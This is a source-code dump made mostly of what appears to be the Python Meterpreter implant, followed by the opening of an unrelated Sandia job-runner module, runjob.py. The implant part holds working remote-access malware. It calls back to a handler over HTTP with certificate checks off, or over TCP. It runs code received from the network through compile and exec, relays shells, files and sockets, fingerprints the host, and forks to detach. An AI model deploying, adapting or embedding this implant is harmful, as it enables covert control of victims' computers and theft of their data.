data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
@export
def tlv_pack_request(method, parts=None):
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, method)
pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
parts = parts or []
for part in parts:
pkt += tlv_pack(part['type'], part['value'])
return pkt
#@export
class MeterpreterChannel(object):
def core_close(self, request, response):
self.close()
return ERROR_SUCCESS, response
def core_eof(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, self.eof())
return ERROR_SUCCESS, response
def core_read(self, request, response):
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, self.read(length))
return ERROR_SUCCESS, response
def core_write(self, request, response):
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
response += tlv_pack(TLV_TYPE_LENGTH, self.write(channel_data))
return ERROR_SUCCESS, response
def close(self):
raise NotImplementedError()
def eof(self):
return False
def is_alive(self):
return True
def notify(self):
return None
def read(self, length):
raise NotImplementedError()
def write(self, data):
raise NotImplementedError()
#@export
class MeterpreterFile(MeterpreterChannel):
def __init__(self, file_obj):
self.file_obj = file_obj
super(MeterpreterFile, self).__init__()
def close(self):
self.file_obj.close()
def eof(self):
return self.file_obj.tell() >= os.fstat(self.file_obj.fileno()).st_size
def read(self, length):
return self.file_obj.read(length)
def write(self, data):
self.file_obj.write(data)
return len(data)
export(MeterpreterFile)
#@export
class MeterpreterProcess(MeterpreterChannel):
def __init__(self, proc_h):
self.proc_h = proc_h
super(MeterpreterProcess, self).__init__()
def close(self):
self.proc_h.kill()
def is_alive(self):
return self.proc_h.poll() is None
def read(self, length):
data = ''
stdout_reader = self.proc_h.stdout_reader
if stdout_reader.is_read_ready():
data = stdout_reader.read(length)
return data
def write(self, data):
self.proc_h.write(data)
return len(data)
export(MeterpreterProcess)
#@export
class MeterpreterSocket(MeterpreterChannel):
def __init__(self, sock):
self.sock = sock
self._is_alive = True
super(MeterpreterSocket, self).__init__()
def core_write(self, request, response):
try:
status, response = super(MeterpreterSocket, self).core_write(request, response)
except socket.error:
self.close()
self._is_alive = False
status = ERROR_FAILURE
return status, response
def close(self):
return self.sock.close()
def fileno(self):
return self.sock.fileno()
def is_alive(self):
return self._is_alive
def read(self, length):
return self.sock.recv(length)
def write(self, data):
return self.sock.send(data)
export(MeterpreterSocket)
#@export
class MeterpreterSocketTCPClient(MeterpreterSocket):
pass
export(MeterpreterSocketTCPClient)
#@export
class MeterpreterSocketTCPServer(MeterpreterSocket):
pass
export(MeterpreterSocketTCPServer)
#@export
class MeterpreterSocketUDPClient(MeterpreterSocket):
def __init__(self, sock, peer_address=None):
super(MeterpreterSocketUDPClient, self).__init__(sock)
self.peer_address = peer_address
def core_write(self, request, response):
peer_host = packet_get_tlv(request, TLV_TYPE_PEER_HOST).get('value')
peer_port = packet_get_tlv(request, TLV_TYPE_PEER_PORT).get('value')
if peer_host and peer_port:
peer_address = (peer_host, peer_port)
elif self.peer_address:
peer_address = self.peer_address
else:
raise RuntimeError('peer_host and peer_port must be specified with an unbound/unconnected UDP channel')
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
try:
length = self.sock.sendto(channel_data, peer_address)
except socket.error:
self.close()
self._is_alive = False
status = ERROR_FAILURE
else:
response += tlv_pack(TLV_TYPE_LENGTH, length)
status = ERROR_SUCCESS
return status, response
def read(self, length):
return self.sock.recvfrom(length)[0]
def write(self, data):
self.sock.sendto(data, self.peer_address)
export(MeterpreterSocketUDPClient)
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = bytes()
self.data_lock = threading.RLock()
def run(self):
for byte in iter(lambda: self.std.read(1), bytes()):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def peek(self, l = None):
data = bytes()
self.data_lock.acquire()
if l == None:
data = self.data
else:
data = self.data[0:l]
self.data_lock.release()
return data
def read(self, l = None):
self.data_lock.acquire()
data = self.peek(l)
self.data = self.data[len(data):]
self.data_lock.release()
return data
#@export
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
debug_print('[*] starting process: ' + repr(args[0]))
subprocess.Popen.__init__(self, *args, **kwargs)
self.echo_protection = False
def is_alive(self):
return self.poll() is None
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, self.is_alive)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, self.is_alive)
self.stderr_reader.start()
def write(self, channel_data):
length = self.stdin.write(channel_data)
self.stdin.flush()
if self.echo_protection:
end_time = time.time() + 0.5
out_data = bytes()
while (time.time() < end_time) and (out_data != channel_data):
if self.stdout_reader.is_read_ready():
out_data = self.stdout_reader.peek(len(channel_data))
if out_data == channel_data:
self.stdout_reader.read(len(channel_data))
return length
export(STDProcess)
class Transport(object):
def __init__(self):
self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
self.communication_last = 0
self.retry_total = SESSION_RETRY_TOTAL
self.retry_wait = SESSION_RETRY_WAIT
self.request_retire = False
def __repr__(self):
return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
@property
def communication_has_expired(self):
return self.communication_last + self.communication_timeout < time.time()
@property
def should_retire(self):
return self.communication_has_expired or self.request_retire
@staticmethod
def from_request(request):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if url.startswith('tcp'):
transport = TcpTransport(url)
elif url.startswith('http'):
proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
http_headers = packet_get_tlv(request, TLV_TYPE_TRANS_HEADERS).get('value', None)
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
if http_headers:
headers = {}
for h in http_headers.strip().split("\r\n"):
p = h.split(':')
headers[p[0].upper()] = ''.join(p[1:0])
http_host = headers.get('HOST')
http_cookie = headers.get('COOKIE')
http_referer = headers.get('REFERER')
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent, http_host=http_host,
http_cookie=http_cookie, http_referer=http_referer)
transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value', SESSION_COMMUNICATION_TIMEOUT)
transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value', SESSION_RETRY_TOTAL)
transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value', SESSION_RETRY_WAIT)
return transport
def _activate(self):
return True
def activate(self):
end_time = time.time() + self.retry_total
while time.time() < end_time:
try:
activate_succeeded = self._activate()
except:
activate_succeeded = False
if activate_succeeded:
self.communication_last = time.time()
return True
time.sleep(self.retry_wait)
return False
def _deactivate(self):
return
def deactivate(self):
try:
self._deactivate()
except:
pass
self.communication_last = 0
return True
def decrypt_packet(self, pkt):
if pkt and len(pkt) > PACKET_HEADER_SIZE:
# We don't support AES encryption yet, so just do the normal
# XOR thing and move on
xor_key = struct.unpack('BBBB', pkt[:PACKET_XOR_KEY_SIZE])
raw = xor_bytes(xor_key, pkt)
return raw[PACKET_HEADER_SIZE:]
return None
def get_packet(self):
self.request_retire = False
try:
pkt = self.decrypt_packet(self._get_packet())
except:
debug_traceback()
return None
if pkt is None:
return None
self.communication_last = time.time()
return pkt
def encrypt_packet(self, pkt):
# The packet now has to contain session GUID and encryption flag info
# And given that we're not yet supporting AES, we're going to just
# always return the session guid and the encryption flag set to 0
# TODO: we'll add encryption soon!
xor_key = rand_xor_key()
raw = binascii.a2b_hex(bytes(SESSION_GUID, 'UTF-8')) + struct.pack('>I', ENC_NONE) + pkt
result = struct.pack('BBBB', *xor_key) + xor_bytes(xor_key, raw)
return result
def send_packet(self, pkt):
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.request_retire = False
try:
self._send_packet(self.encrypt_packet(pkt))
except:
debug_traceback()
return False
self.communication_last = time.time()
return True
def tlv_pack_timeouts(self):
response = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
return response
def tlv_pack_transport_group(self):
trans_group = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
trans_group += self.tlv_pack_timeouts()
return trans_group
class HttpTransport(Transport):
def __init__(self, url, proxy=None, user_agent=None, http_host=None, http_referer=None, http_cookie=None):
super(HttpTransport, self).__init__()
opener_args = []
scheme = url.split(':', 1)[0]
if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
import ssl
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
if proxy:
opener_args.append(urllib.ProxyHandler({scheme: proxy}))
self.proxy = proxy
opener = urllib.build_opener(*opener_args)
opener.addheaders = []
if user_agent:
opener.addheaders.append(('User-Agent', user_agent))
if http_cookie:
opener.addheaders.append(('Cookie', http_cookie))
if http_referer:
opener.addheaders.append(('Referer', http_referer))
self.user_agent = user_agent
urllib.install_opener(opener)
self.url = url
self._http_request_headers = {'Content-Type': 'application/octet-stream'}
if http_host:
self._http_request_headers['Host'] = http_host
self._first_packet = None
self._empty_cnt = 0
def _activate(self):
return True
self._first_packet = None
packet = self._get_packet()
if packet is None:
return False
self._first_packet = packet
return True
def _get_packet(self):
if self._first_packet:
packet = self._first_packet
self._first_packet = None
return packet
packet = None
xor_key = None
request = urllib.Request(self.url, None, self._http_request_headers)
try:
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
packet = url_h.read()
for _ in range(1):
if packet == '':
break
if len(packet) < PACKET_HEADER_SIZE:
packet = None # looks corrupt
break
xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE])
header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE])
pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF+PACKET_LENGTH_SIZE])[0] - 8
if len(packet) != (pkt_length + PACKET_HEADER_SIZE):
packet = None # looks corrupt
except:
debug_traceback('Failure to receive packet from ' + self.url)
if not packet:
delay = 10 * self._empty_cnt
if self._empty_cnt >= 0:
delay *= 10
self._empty_cnt += 1
time.sleep(float(min(10000, delay)) / 1000)
return packet
self._empty_cnt = 0
return packet
def _send_packet(self, packet):
request = urllib.Request(self.url, packet, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
response = url_h.read()
def patch_uri_path(self, new_path):
match = re.match(r'https?://[^/]+(/.*$)', self.url)
if match is None:
return False
self.url = self.url[:match.span(1)[0]] + new_path
return True
def tlv_pack_transport_group(self):
trans_group = super(HttpTransport, self).tlv_pack_transport_group()
if self.user_agent:
trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
if self.proxy:
trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
return trans_group
class TcpTransport(Transport):
def __init__(self, url, socket=None):
super(TcpTransport, self).__init__()
self.url = url
self.socket = socket
self._cleanup_thread = None
self._first_packet = True
def _sock_cleanup(self, sock):
remaining_time = self.communication_timeout
while remaining_time > 0:
iter_start_time = time.time()
if select.select([sock], [], [], remaining_time)[0]:
if len(sock.recv(4096)) == 0:
break
remaining_time -= time.time() - iter_start_time
sock.close()
def _activate(self):
address, port = self.url[6:].rsplit(':', 1)
port = int(port.rstrip('/'))
timeout = max(self.communication_timeout, 30)
if address in ('', '0.0.0.0', '::'):
try:
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind(('', port))
server_sock.listen(1)
if not select.select([server_sock], [], [], timeout)[0]:
server_sock.close()
return False
sock, _ = server_sock.accept()
server_sock.close()
else:
if ':' in address:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((address, port))
sock.settimeout(None)
self.socket = sock
self._first_packet = True
return True
def _deactivate(self):
cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
cleanup.run()
self.socket = None
def _get_packet(self):
first = self._first_packet
self._first_packet = False
if not select.select([self.socket], [], [], 0.5)[0]:
return bytes()
packet = self.socket.recv(PACKET_HEADER_SIZE)
if packet == '': # remote is closed
self.request_retire = True
return None
if len(packet) != PACKET_HEADER_SIZE:
if first and len(packet) == 4:
received = 0
header = packet[:4]
pkt_length = struct.unpack('>I', header)[0]
self.socket.settimeout(max(self.communication_timeout, 30))
while received < pkt_length:
received += len(self.socket.recv(pkt_length - received))
self.socket.settimeout(None)
return self._get_packet()
return None
xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE])
# XOR the whole header first
header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE])
# Extract just the length
pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF+PACKET_LENGTH_SIZE])[0]
pkt_length -= 8
# Read the rest of the packet
rest = bytes()
while len(rest) < pkt_length:
rest += self.socket.recv(pkt_length - len(rest))
# return the whole packet, as it's decoded separately
return packet + rest
def _send_packet(self, packet):
self.socket.send(packet)
@classmethod
def from_socket(cls, sock):
url = 'tcp://'
address, port = sock.getsockname()[:2]
# this will need to be changed if the bind stager ever supports binding to a specific address
if not address in ('', '0.0.0.0', '::'):
address, port = sock.getpeername()[:2]
url += address + ':' + str(port)
return cls(url, sock)
class PythonMeterpreter(object):
def __init__(self, transport):
self.transport = transport
self._transport_sleep = None
self.running = False
self.last_registered_extension = None
self.extension_functions = {}
self.channels = {}
self.next_channel_id = 1
self.interact_channels = []
self.processes = {}
self.next_process_id = 1
self.transports = [self.transport]
self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
self.session_expiry_end = time.time() + self.session_expiry_time
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def register_extension(self, extension_name):
self.last_registered_extension = extension_name
return self.last_registered_extension
def register_function(self, func):
self.extension_functions[func.__name__] = func
return func
def register_function_if(self, condition):
if condition:
return self.register_function
else:
return lambda function: function
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
return func
def add_channel(self, channel):
if not isinstance(channel, MeterpreterChannel):
debug_print('[-] channel object is not an instance of MeterpreterChannel')
raise TypeError('invalid channel object')
idx = self.next_channel_id
self.channels[idx] = channel
debug_print('[*] added channel id: ' + str(idx) + ' type: ' + channel.__class__.__name__)
self.next_channel_id += 1
return idx
def add_process(self, process):
idx = self.next_process_id
self.processes[idx] = process
debug_print('[*] added process id: ' + str(idx))
self.next_process_id += 1
return idx
def get_packet(self):
pkt = self.transport.get_packet()
if pkt is None and self.transport.should_retire:
self.transport_change()
return pkt
def send_packet(self, packet):
send_succeeded = self.transport.send_packet(packet)
if not send_succeeded and self.transport.should_retire:
self.transport_change()
return send_succeeded
@property
def session_has_expired(self):
if self.session_expiry_time == 0:
return False
return time.time() > self.session_expiry_end
def transport_add(self, new_transport):
new_position = self.transports.index(self.transport)
self.transports.insert(new_position, new_transport)
def transport_change(self, new_transport=None):
if new_transport is None:
new_transport = self.transport_next()
self.transport.deactivate()
debug_print('[*] changing transport to: ' + new_transport.url)
while not new_transport.activate():
new_transport = self.transport_next(new_transport)
debug_print('[*] changing transport to: ' + new_transport.url)
self.transport = new_transport
def transport_next(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) + 1
if new_idx == len(self.transports):
new_idx = 0
return self.transports[new_idx]
def transport_prev(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) - 1
if new_idx == -1:
new_idx = len(self.transports) - 1
return self.transports[new_idx]
def run(self):
while self.running and not self.session_has_expired:
request = self.get_packet()
if request:
response = self.create_response(request)
if response:
self.send_packet(response)
if self._transport_sleep:
self.transport.deactivate()
time.sleep(self._transport_sleep)
self._transport_sleep = None
if not self.transport.activate():
self.transport_change()
continue
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = bytes()
write_request_parts = []
if isinstance(channel, MeterpreterProcess):
if not channel_id in self.interact_channels:
continue
proc_h = channel.proc_h
if proc_h.stderr_reader.is_read_ready():
data = proc_h.stderr_reader.read()
elif proc_h.stdout_reader.is_read_ready():
data = proc_h.stdout_reader.read()
elif not channel.is_alive():
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, MeterpreterSocketTCPClient):
while select.select([channel.fileno()], [], [], 0)[0]:
try:
d = channel.read(1)
except socket.error:
d = bytes()
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
elif isinstance(channel, MeterpreterSocketTCPServer):
if select.select([channel.fileno()], [], [], 0)[0]:
(client_sock, client_addr) = channel.sock.accept()
server_addr = channel.sock.getsockname()
client_channel_id = self.add_channel(MeterpreterSocketTCPClient(client_sock))
self.send_packet(tlv_pack_request('tcp_channel_open', [
{'type': TLV_TYPE_CHANNEL_ID, 'value': client_channel_id},
{'type': TLV_TYPE_CHANNEL_PARENTID, 'value': channel_id},
{'type': TLV_TYPE_LOCAL_HOST, 'value': inet_pton(channel.sock.family, server_addr[0])},
{'type': TLV_TYPE_LOCAL_PORT, 'value': server_addr[1]},
{'type': TLV_TYPE_PEER_HOST, 'value': inet_pton(client_sock.family, client_addr[0])},
{'type': TLV_TYPE_PEER_PORT, 'value': client_addr[1]},
]))
elif isinstance(channel, MeterpreterSocketUDPClient):
if select.select([channel.fileno()], [], [], 0)[0]:
try:
data, peer_address = channel.sock.recvfrom(65535)
except socket.error:
self.handle_dead_resource_channel(channel_id)
else:
write_request_parts.extend([
{'type': TLV_TYPE_PEER_HOST, 'value': peer_address[0]},
{'type': TLV_TYPE_PEER_PORT, 'value': peer_address[1]},
])
if data:
write_request_parts.extend([
{'type': TLV_TYPE_CHANNEL_ID, 'value': channel_id},
{'type': TLV_TYPE_CHANNEL_DATA, 'value': data},
{'type': TLV_TYPE_LENGTH, 'value': len(data)},
])
self.send_packet(tlv_pack_request('core_channel_write', write_request_parts))
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
self.send_packet(tlv_pack_request('core_channel_close', [
{'type': TLV_TYPE_CHANNEL_ID, 'value': channel_id},
]))
def _core_set_uuid(self, request, response):
new_uuid = packet_get_tlv(request, TLV_TYPE_UUID)
if new_uuid:
PAYLOAD_UUID = binascii.b2a_hex(new_uuid['value'])
return ERROR_SUCCESS, response
def _core_enumextcmd(self, request, response):
extension_name = packet_get_tlv(request, TLV_TYPE_STRING)['value']
for func_name in self.extension_functions.keys():
if func_name.split('_', 1)[0] == extension_name:
response += tlv_pack(TLV_TYPE_STRING, func_name)
return ERROR_SUCCESS, response
def _core_get_session_guid(self, request, response):
response += tlv_pack(TLV_TYPE_SESSION_GUID, binascii.a2b_hex(bytes(SESSION_GUID, 'UTF-8')))
return ERROR_SUCCESS, response
def _core_set_session_guid(self, request, response):
new_guid = packet_get_tlv(request, TLV_TYPE_SESSION_GUID)
if new_guid:
SESSION_GUID = binascii.b2a_hex(new_guid['value'])
return ERROR_SUCCESS, response
def _core_machine_id(self, request, response):
serial = ''
machine_name = platform.uname()[1]
if has_windll:
from ctypes import wintypes
k32 = ctypes.windll.kernel32
sys_dir = ctypes.create_unicode_buffer(260)
if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
return ERROR_FAILURE_WINDOWS
vol_buf = ctypes.create_unicode_buffer(260)
fs_buf = ctypes.create_unicode_buffer(260)
serial_num = wintypes.DWORD(0)
if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
None, fs_buf, ctypes.sizeof(fs_buf)):
return ERROR_FAILURE_WINDOWS
serial_num = serial_num.value
serial = "%04x" % ((serial_num >> 16) & 0xffff) + '-' "%04x" % (serial_num & 0xffff)
else:
serial = get_hdd_label()
response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
return ERROR_SUCCESS, response
def _core_native_arch(self, request, response):
response += tlv_pack(TLV_TYPE_STRING, get_native_arch())
return ERROR_SUCCESS, response
def _core_patch_url(self, request, response):
if not isinstance(self.transport, HttpTransport):
return ERROR_FAILURE, response
new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if not self.transport.patch_uri_path(new_uri_path):
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE, response
self.last_registered_extension = None
symbols_for_extensions = {'meterpreter':self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], '', 'exec'))
extension_name = self.last_registered_extension
if extension_name:
check_extension = lambda x: x.startswith(extension_name)
lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
for method in lib_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_transport_add(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
return ERROR_SUCCESS, response
def _core_transport_change(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
self.transport_change(new_transport)
return None
def _core_transport_list(self, request, response):
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
transport = self.transport_next()
while transport != self.transport:
response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
transport = self.transport_next(transport)
return ERROR_SUCCESS, response
def _core_transport_next(self, request, response):
new_transport = self.transport_next()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
self.transport_change(new_transport)
return None
def _core_transport_prev(self, request, response):
new_transport = self.transport_prev()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
self.transport_change(new_transport)
return None
def _core_transport_remove(self, request, response):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if self.transport.url == url:
return ERROR_FAILURE, response
transport_found = False
for transport in self.transports:
if transport.url == url:
transport_found = True
break
if transport_found:
self.transports.remove(transport)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
def _core_transport_set_timeouts(self, request, response):
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
if not timeout_value is None:
self.session_expiry_time = timeout_value
self.session_expiry_end = time.time() + self.session_expiry_time
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
if timeout_value:
self.transport.communication_timeout = timeout_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
if retry_value:
self.transport.retry_total = retry_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
if retry_value:
self.transport.retry_wait = retry_value
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += self.transport.tlv_pack_timeouts()
return ERROR_SUCCESS, response
def _core_transport_sleep(self, request, response):
seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
if seconds:
self._transport_sleep = seconds
return ERROR_SUCCESS, response
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions:
debug_print('[-] core_channel_open missing handler: ' + handler)
return error_result(NotImplementedError), response
debug_print('[*] core_channel_open dispatching to handler: ' + handler)
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status, response = channel.core_close(request, response)
if status == ERROR_SUCCESS:
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
debug_print('[*] closed and removed channel id: ' + str(channel_id))
return status, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status, response = channel.core_eof(request, response)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status, response = channel.core_read(request, response)
if not channel.is_alive():
self.handle_dead_resource_channel(channel_id)
return status, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status = ERROR_FAILURE
if channel.is_alive():
status, response = channel.core_write(request, response)
# evaluate channel.is_alive() twice because it could have changed
if not channel.is_alive():
self.handle_dead_resource_channel(channel_id)
return status, response
def create_response(self, request):
response = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
response += tlv_pack(method_tlv)
response += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))
handler_name = method_tlv['value']
if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try:
debug_print('[*] running method ' + handler_name)
result = handler(request, response)
if result is None:
return
result, response = result
except Exception:
debug_traceback('[-] method ' + handler_name + ' resulted in an error')
result = error_result()
else:
if result != ERROR_SUCCESS:
debug_print('[-] method ' + handler_name + ' resulted in error: #' + str(result))
else:
debug_print('[-] method ' + handler_name + ' was requested but does not exist')
result = error_result(NotImplementedError)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
if not reqid_tlv:
return
response += tlv_pack(reqid_tlv)
return response + tlv_pack(TLV_TYPE_RESULT, result)
_try_to_fork = TRY_TO_FORK and hasattr(os, 'fork')
if not _try_to_fork or (_try_to_fork and os.fork() == 0):
if hasattr(os, 'setsid'):
try:
os.setsid()
except OSError:
pass
if HTTP_CONNECTION_URL and has_urllib:
transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT,
http_host=HTTP_HOST, http_referer=HTTP_REFERER, http_cookie=HTTP_COOKIE)
else:
# PATCH-SETUP-STAGELESS-TCP-SOCKET #
transport = TcpTransport.from_socket(s)
met = PythonMeterpreter(transport)
# PATCH-SETUP-TRANSPORTS #
met.run()
|
runjob.py
|
#!/usr/bin/env python
# Copyright 2018 National Technology & Engineering Solutions of Sandia, LLC
# (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S.
# Government retains certain rights in this software.
import sys
sys.dont_write_bytecode = True
sys.excepthook = sys.__excepthook__
import os
import time
import threading
import pipes
import traceback
import command
"""
Functions in this file run commands in a subprocess, such that
1. Output is always redirected to a log file
2. Commands are run and managed in the background
3. Commands can be executed on remote machines
The key functions are:
run_job : start a command in the background, and return a Job id
poll_job : returns True if a job id has completed
wait_job : waits for a job to complete, and returns the exit status
wait_all : waits for all jobs to complete or a list of job ids
run_wait : convenience function for run_job() plus wait_job()
Commands to be run can be specified using
1. A single string, which is treated as a shell command
2. Multiple arguments, each of which are treated as a single shell argument
3. A single command.Command() object
The third form is the most versatile; refer to the command module for
documentation.
Note: Look at the documentation below in the function "def _is_dryrun" for use
of the envronment variable COMMAND_DRYRUN for noop execution.
"""
def run_job( *args, **kwargs ):
"""
Starts a job in the background and returns the job id. The argument list
can be a single command.Command() object, a single string, or multiple
string arguments. The optional keyword attributes are
name : give the job a name, which prefixes the log file name
chdir : change to this directory before running the command
shell : True means apply shell expansion to the command, while False
means do not; default is True
